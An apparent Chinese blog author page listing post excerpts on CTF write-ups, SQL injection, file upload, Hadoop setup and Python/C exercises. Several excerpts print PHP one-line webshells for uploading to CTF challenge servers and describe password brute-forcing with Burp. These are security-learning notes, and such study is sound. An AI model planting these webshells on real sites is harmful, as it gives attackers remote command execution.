- 博客(38)
- 收藏
- 关注
RSS订阅原创 大数据技术之HADOOP搭建
一、虚拟机的安装二、CentOS的安装记得选择镜像文件如果报虚拟化错误,记得在BIOS操作系统界面开启一下。安装的时候可以不用选择分区的设置。中间的一些设置:如果你的虚拟机安装过程中老黑屏,试试如下设置。安装成功后,不会出现图形化界面的。三、讲解远程连接工具的使用1、通过finalShell 远程连接LinuxFinalShell 可以远程输入Linux的命令操作,类似于Linux的黑窗口还可以远程将本地的文件上传给Linux,Linux下的文件也可以下载到本地电脑。2、通
2022-01-01 16:44:06
1728
原创 “百度杯”CTF比赛 十月场 writeup
分值:10分 类型:Misc题目名称:考眼力未解答题目内容: gmbh{4d850d5c3c2756f67b91cbe8f046eebd} try to find the flag
2021-08-30 23:44:04
1408
原创 BugkuCTF—赛博朋克记录关于ZIP文件文件头协议和LSB隐写
原题1)打开是一个加密的zip文件,将其拖到txt空白文档发现开头为PK,确实为压缩文件2)没任何提示情况下我们用010打开,查看是否为伪加密(一般没有任何提示大多数为伪加密,少数情况需要暴力破解)-----------知识分割线--------------ZIP文件——文件头协议一个 ZIP 文件由三个部分组成: 压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志压缩源文件数据区:50 4B 03 04:这是头文件标记(0x04034b50)14 00:解压文件所需 pkwar
2021-01-25 19:14:56
2056
2
原创 windows操作系统
windows操作系统一句话木马执行系统命令<?php @eval($_POST['cmd']);?><?php?>Windows安全基础1、Windows Server介绍01 Server介绍Windows Server是微软在2003.4.24推出的第一款独立的服务器操作系统,核心是Microsoft Windows Server System(WSS)Windows NT 3.1 是微软第一款带有Server(服务器)版本的Windows系统02 Wind
2021-01-16 13:59:07
1443
原创 i-春秋选手训练营-web训练
10pt“百度杯”CTF比赛 2017 二月场Misc web 爆破-1PHP一个比较有意思的变量!$GLOBALS:一个包含了全部变量的全局组合数组。变量的名字就是数组的键。<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则表达式,匹配字符串,\w表示字符+数字+下划线,*代表有若干个\w字
2020-12-20 08:58:22
406
1
原创 文件上传
一句话木马<?php @eval(@$_POST['cmd']);?><?php eval($_POST['cmd']); ?>CTFHub文件上传为例01 无验证写个一句话shell传上去,然后手动或者用蚁剑(这周任务学完写个蚁剑的简单用法总结)连上去,在www目录(好像),就可以找到flag文件,打开就可以拿到flag。一句话,实战的话,尽量用一些比较特别的参数名当然也可以手工shell,手工shell的话,eval里要用GET写一个php文件为一句话木马
2020-11-26 11:29:40
261
2
原创 MySQL数据库以及SQL注入笔记
01 SQL注入概念所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。02 首先学习MySQL数据库的一些基本操作1)创建(CREATE)create 创建数据库 CREATE DATABASE 数据库名;创建数据表CREATE TABLE table_name (column_name column_type);2)删除(DROP)drop 命令删除数据库drop database <数据库名>;
2020-11-19 11:26:17
250
原创 CTFHub——Web前置技能——信息泄露——git
get泄露当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 打开环境 http://challenge-d043310a994a68c6.sandbox.ctfhub.com:10080/用御剑扫描,只扫描出 URL/index.html 所以我们用另外的扫描工具 dirsearch 来扫描安装及使用方法(转载)...
2020-11-14 09:38:09
1249
原创 CTFHub——Web前置技能——信息泄露
Web前置技能——信息泄露01 目录遍历打开环境 http://challenge-e1eafbcf96a48116.sandbox.ctfhub.com:10080/打开后显示flag_in_here从1/到4/遍历(共遍历16次)在4/4中发现一个flag文件,下载打开发现flag:ctfhub{2f852cb240af833196be008a}02 phpinfo打开环境 http://challenge-3a5a5c14ae1f940f.sandbox.ctfhub.com:
2020-11-04 11:12:42
763
原创 CTFHub-Web基础认证
在CTFHub中被搁置好久的题:原地址(1)打开链接点击click得到一个输入框“Do u know admin?”可知这个题的用户名大概率是”admin“(2)下载附件得到一个压缩包,解压是一个密码本,你可以一个一个试,不过这是最笨的方法我们可以用burp抓包,进行密码爆破在Basic后面有一串字符像Basic 64 将它 “YWRtaW46MTlzNDU=” 解码得admin:19s45可知这串字符是这个题的用户名和密码;(3)将它进行爆破将数据发送到 Intruder 进行
2020-10-29 21:45:11
870
原创 PHP代码审计入门
一:代码审计的定义通过阅读一些程序的源码去发现潜在的漏洞,比如代码不规范,算法性能不够,代码重用性不强以及其他的缺陷等等从安全人员的角度来看是:查找代码中是否存在安全问题,推断用户在操作这个代码对应功能的时候,能否跳出开发人员设想的场景和逻辑,去给网站数据或者服务器造成危害。其次代码审计可以发现一些扫描器难以发现的细节,比如某一个特定的功能场景,只有当你传入特定的参数值的时候,才会触发这个漏...
2020-09-19 17:30:25
365
原创 Notepad++配置java编译环境
用cmd运行Java比较慢,后来用我以前用的文本编辑器编辑java首先下载Notpad++然后在里面写下你的一个java程序HelloWorld.javapublic class HelloWorld { public static void main(String[] args) { System.out.println("Hello World!"); }}打开运行在里面输入cmd /k javac "$(FULL_CURRENT_PATH)" & echo 编译成功
2020-09-05 12:21:42
388
原创 Java入门第一个程序的坎坷路(HelloWorld.java:1: 错误: 写入HelloWorld时出错: HelloWorld.class (拒绝访问。))
第一步下载安装Java SE jdk详细步骤看:Java JDK 下载安装,以及环境配置(我见过最详细的)使用: 1、在bin新建本文件,编写代码,重命名改后缀名为 **.java 2、win+R->cmd->”javac **.java“命令编译,生成 *.class字节码文件 3、再”Java **“运行程序,得到运行结果基本格式修饰符 class 类名{ 程序代码}如:HelloWorld.javapublic class HelloWorld{
2020-07-13 17:29:39
20365
16
原创 C语言程序设计——“猜数游戏”
想起下学期开学第一周的程序设计作业——猜数游戏猜数游戏计算机“想”一个数请人猜,如果猜对了,提示“Right!”;否则“Wrong!”,并告诉所猜的数是大还是小,直到猜对结束,最后给出猜测的次数。可怜的我没有做出来,但是聪明的我用python做出来了,惊不惊喜意不意外。^ > ^虽然没有做成要求那样,但是,我可是费了脑子的。。。。import randomsecrent1 = random.randint(1,10)secrent2 = random.randint(10,100)
2020-06-18 00:00:58
3580
原创 用python中turtle模块去画“重庆工商大学融智学院”校门
——————————————————————快考试了,希望不挂科,不挂科。。。。。——————————————————————分享自己好久前写下的代码,证明一下自己的努力下面事正经内容划重点划重点import turtle as tt.setup(1000,400,0,0)#t.bgcolor("white")t.speed(20) #设置画笔的速度def l_side_door(x):#左侧门 t.begin_fill() t.fillcolor("#F5D79B")
2020-06-12 10:27:08
6599
26
原创 ZZULIOJ.1055:兔子繁殖问题 —— 1065: 统计数字字符的个数(C语言 Vs Python)
1055: 兔子繁殖问题题目描述这是一个有趣的古典数学问题,著名意大利数学家Fibonacci曾提出一个问题:有一对小兔子,从出生后第3个月起每个月都生一对兔子。小兔子长到第3个月后每个月又生一对兔子。按此规律,假设没有兔子死亡,第一个月有一对刚出生的小兔子,问第n个月有多少对兔子?输入 输入月数n(1<=n<=44)。输出 输出第n个月有多少对兔子。样例输入 Copy3样例输出 Copy2提示本题是一个经典的递推入门题目: 用f(n)表示第n个月的兔子数目,则: f(n)
2020-05-09 12:40:24
1433
原创 ZZULIOJ.1044: 不及格率 —— 1054: 猴子吃桃(C语言 Vs Python)
1044: 不及格率题目描述输入n和n个学生成绩(实数),输出不及格率。输入 输入的第一行是一个整数n,第二行是n个实数,用空格隔开。输出 输出一个实数,表示不及格率,结果保留2位小数,单独占一行。样例输入 Copy898 45 86 79 56 75 90 70样例输出 Copy0.25提示注意,不及格率为0时,输出0.00#include<stdio.h>...
2020-05-09 12:29:41
2208
1
原创 ZZULIOJ.1033: 五级制成绩 —— 1043: 最大值(C语言 Vs Python)
目录1033: 五级制成绩1034: 夏季促销1035: 分段函数求值1036: 某年某月有多少天1037: 四则运算1038: 绝对值最大1039: n个数求和1040: 数列求和11041: 数列求和21042: 数列求和31043: 最大值1044: 不及格率1033: 五级制成绩题目描述给定一个百分制成绩, 请根据百分制成绩输出其对应的等级。转换关系如下:90分及以上为’A’,80...
2020-05-03 02:27:31
2053
原创 ZZULIOJ.1022: 三整数排序 —— 1032: 员工薪水(C语言 Vs Python)
这里写目录标题1022: 三整数排序1023: 大小写转换1024: 计算字母序号1025: 最大字符1026: 字符类型判断1027: 判断水仙花数1022: 三整数排序题目描述从键盘输入三个整数x,y和z,按从大到小的顺序输出它们的值。输入 输入三个整数x,y和z。输出 按从大到小的顺序输出它们的值。样例输入 Copy20 16 18样例输出 Copy20 18 16/*c...
2020-04-25 00:10:10
1416
原创 在python中下载运行request模板,以及解决pyCharm不能运行requests的问题
详细介绍在win10+python3.7 环境下如何安装requsets模块,以及,解决pyCharm不能运行requests的问题,那些年我们一起走过的坑留下的没技术泪。一、找到python > pip安装路径首先我们找到python安装路径,我们知道我们曾经设置过python的环境变量,找到它,里面有我们想要的python安装路径。可以在windows左下角搜索高级系统设置,打开系...
2020-04-17 23:52:34
3772
7
原创 网络安全实验室CTF—基础关 writeup
自己总结的解题方法,里面方法仅供查考本文链接:网络信息安全攻防学习平台--基础关key在哪里?再加密一次你就得到key啦~猜猜这是经过了多少次加密?据说MD5加密很安全,真的是么?种族歧视HAHA浏览器key究竟在哪里呢?key又找不到了冒充登录用户比较数字大小本地的诱惑就不让你访问key在哪里?安全攻防基础关1 key在哪里?F12或Ctrl+U查看源码,得到flag再加密一次你就...
2020-04-14 20:52:05
2603
3
原创 ZZULIOJ.1011: 圆柱体表面积 —— 1021:三个整数的最大值(C语言 Vs Python)
目录1011: 圆柱体表面积1012: 求绝对值1013: 求两点间距离1014: 求三角形的面积1015: 计算时间间隔1011: 圆柱体表面积题目描述输入圆柱体的底面半径r和高h,计算圆柱体的表面积并输出到屏幕上。要求定义圆周率为如下宏常量#define PI 3.14159输入 输入两个实数,为圆柱体的底面半径r和高h。输出 输出一个实数,即圆柱体的表面积,保留2位小数。样例输...
2020-04-14 11:27:50
1293
原创 ZZULIOJ.1000:整数 a+b ——1010:求圆的周长和面积(C语言 Vs Python)
目录1000:整数 a+b1001:植树问题1002:简单多项式求值1003: 两个整数的四则运算1004: 三位数的数位分离1005: 整数幂1006: 求等差数列的和1007: 鸡兔同笼1008: 美元和人民币1009: 求平均分1010: 求圆的周长和面积1000:整数 a+b题目描述计算两个整数的和。输入 输入两个整数,两个整数用空格隔开。输出 输出为两个整数的和,单独占一行...
2020-04-13 20:39:04
2117
原创 【CTFWeb 基础】总结笔记以及实例题(2)
自己总结的基础笔记,里面所用题型都为基础题型仅供查考本文链接:目录8.源码获取9.弱密码爆破10.本文所用实例链接Bugku web5攻防世界新手区 weak_authBugku 输入密码查看flag8.源码获取由于现在当前大量开发人员使用git进行版本控制,对站点自动部署。 如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。GitHack是一...
2020-04-12 15:30:40
647
原创 【python基础】整理笔记(3)
10.3.7 使用多个文件将上一个程序的代码移到一个函数中def count(file):try: with open('xxx.txt') as file_object: contents = file_object.read()except FileNotFoundError: print("Sorry,the file xxx.txt does not exis...
2020-04-09 12:00:08
192
原创 BugKu 备份是个好习惯(扫描以及PHP弱类型中MD5绕过)
——题记——这个题重要考察都PHP代码的理解以及PHP弱类型中MD5绕过题型的考察PHP弱类型string(字符串)integer(整数)array(数组)double(浮点数)boolean(布尔)objectresourceNULL题型1 strcmp 比较字符串大小题型2 MD5绕过方法1 科学计数法绕过 md5(‘QNKXDZO’)==md5(‘24061070...
2020-04-07 14:13:15
374
原创 【python基础】整理笔记(2)
第九章 类编写表示现实世界中的事物和类型的类,并基于这些类来创建对象。根据类来创建对象被称为实例化。9.1.1 创建类方法 __init __()将方法定义成三个形参:self、name、age。在这个方法的定义中,形参 self 必不可少,还必须位于其他形参的前面,将自动传递self。class Dog(): """ 模拟小狗的简单尝试 """ def __init__...
2020-04-02 19:39:55
280
原创 【python基础】整理笔记(1)
第一部分 基础知识第一章 起步python2/3的搭建第二章 变量和简单数据类型2.1 print(“Hello world!”)2.2 变量message = "Hello world!" print(message)2.3 字符串("",’’)2.3.1 修改字符串的大小写message = "ade love" print(message.title()) 输出 ...
2020-03-29 17:12:32
1073
原创 【CTFWeb 基础】总结笔记以及实例题(1)
自己总结的基础笔记,仅供查考1.查看源代码例:http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.php(F12或Ctrl+U)2.查看HTTP请求头或响应头使用抓包工具(burp)查看HTTP请求,在 Repeater 中查看响应头例:http://lab1.xseclab.com/base7_eb...
2020-03-19 12:14:27
4651
2
原创 BugKu 旋转跳跃(mp3stego(mp3隐写工具)的使用)
今天碰到一道简单的音频隐写题但是研究的好长时间才学会MP3隐写工具的使用,今天给大家分享一下。下载解压发现是一个音频,打开听也是听不出来有什么线索的。。所以呢。。我们想到是不是音频隐写,由于第一次接触这类题,所以先要下载工具MP3隐写工具下载开始尝试使用工具MP3Stego来对音频进行解码,下载出来依然是一个压缩包解压到桌面(解压到哪里都可以,主要是下载到桌面方便),打开到有Decode....
2020-02-17 21:27:22
1544
2
原创 攻防世界:Web (新手练习题)之 weak_auth
weak auth想玩玩攻防世界的朋友,CE已附上XCTF Web 练习题链接:https://adworld.xctf.org.cn/解题思路:首先什么都不输入先logon得到并弹窗提示:please login as admin!(请以管理员身份登录)我们再打开check.php 的页面源代码看看会不会有什么线索发现在有注释的信息,提示:maybe you need a di...
2020-02-12 14:46:53
1410
原创 C语言程序设计——“通讯录管理系统”
大一下第一周实训,C语言程序设计,在众多标题中选了一个我能写出来的,通讯录管理系统这一个很经典的题目,在我心中和学籍管里系统、分数统计系统并列。今天分享通讯录管理系统的代码。小型通讯录管理系统设计一个程序实现通讯录的管理,能够实现联系人的添加、查询、删除和显示功能,用数据文件存放通讯录信息。具体要求如下:(1)添加功能:根据输入的联系人的姓名、地址、联系方式,QQ号等信息,把该联系人添加到...
2020-02-10 23:08:45
11161
6
原创 Bugku 猫片(安恒)(Stegsolve分析)
今天发现了一道又爱又恨的题,决定分享出来。打开得到png用010editor打开发现为png文件,加上后缀得到用010editor打开没有异常。虚拟机binwalk一下,依然没有异常。查看属性没有异常。超乎我的想象。返回在题目中发现hint:LSB BGR NTFS逐个浏览器搜索hint:LSB BGR NTFSLSB 最低有效位/最低有效字节BGR R红 G绿 B蓝 RG...
2020-02-01 13:58:21
861
原创 Misc杂项学习笔记以及工具(1)
1.文件格式分析(1)010 Editor一款专业的文本编辑器和十六进制编辑器,它可以编辑文本文件,包括 Uni code 文件、批处理文件、C/C++、XML 等,功能全面且强大,可以说是目前最强大的十六进制编辑器了。(2)winhex和010 Editor类似是一款非常不错的 16 进制编辑器, 是一个专门用来对付各种日常紧急情况的工具。它可以用来检查和修复各种文件、恢复删除文件、硬...
2020-01-31 18:23:57
1416
原创 Linux学习
Linux处理目录的常用命令ls: 列出目录cd:切换目录pwd:显示目前的目录mkdir:创建一个新的目录rmdir:删除一个空的目录cp: 复制文件或目录rm: 移除文件或目录mv: 移动文件与目录,或修改文件与目录的名称想详细学习各个命令添加链接描述Linux常见目录的解释:/bin:bin是Binary的缩写, 这个目录存放着最经常使用的命令。/boot:这...
2020-01-30 15:06:41
205
原创 bugku杂项专栏---隐写题
隐写打开得到一个2.rar的文件,下载得到一张图片。把它放入winhex中发现IUDR(文件头数据块),在第二行将表示图像的高的4个字节00 00 00 A4改为00 00 00 F4得到flag隐写2打开得到一张图片1.保存到本地用winhex查看发现没有异常。2.查看属性没有异常。3.将它拖进文本查找flag发现flag.rar。把图片的后缀名改为rar打开打开提示...
2020-01-22 17:32:14
463
原创 对于bugku中有“post”解法以及hackbar插件的理解
“$_POST”解法在初学安全而且已经写了一部分BugkuCTF中web的一部分题以后发现对于有“get”和“post"的不同。这是一个关于“get"的题,根据代码构造下做一个代码请求就可以出现flag了这是一个“post”的题,咋一看和“get”相似,但是做了一个代码请求发现不对。去问了一下度娘,get和post是HTTP与服务器交互的方式,get是获取数据,post是修改数据。而想...
2020-01-15 20:02:09
3343
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人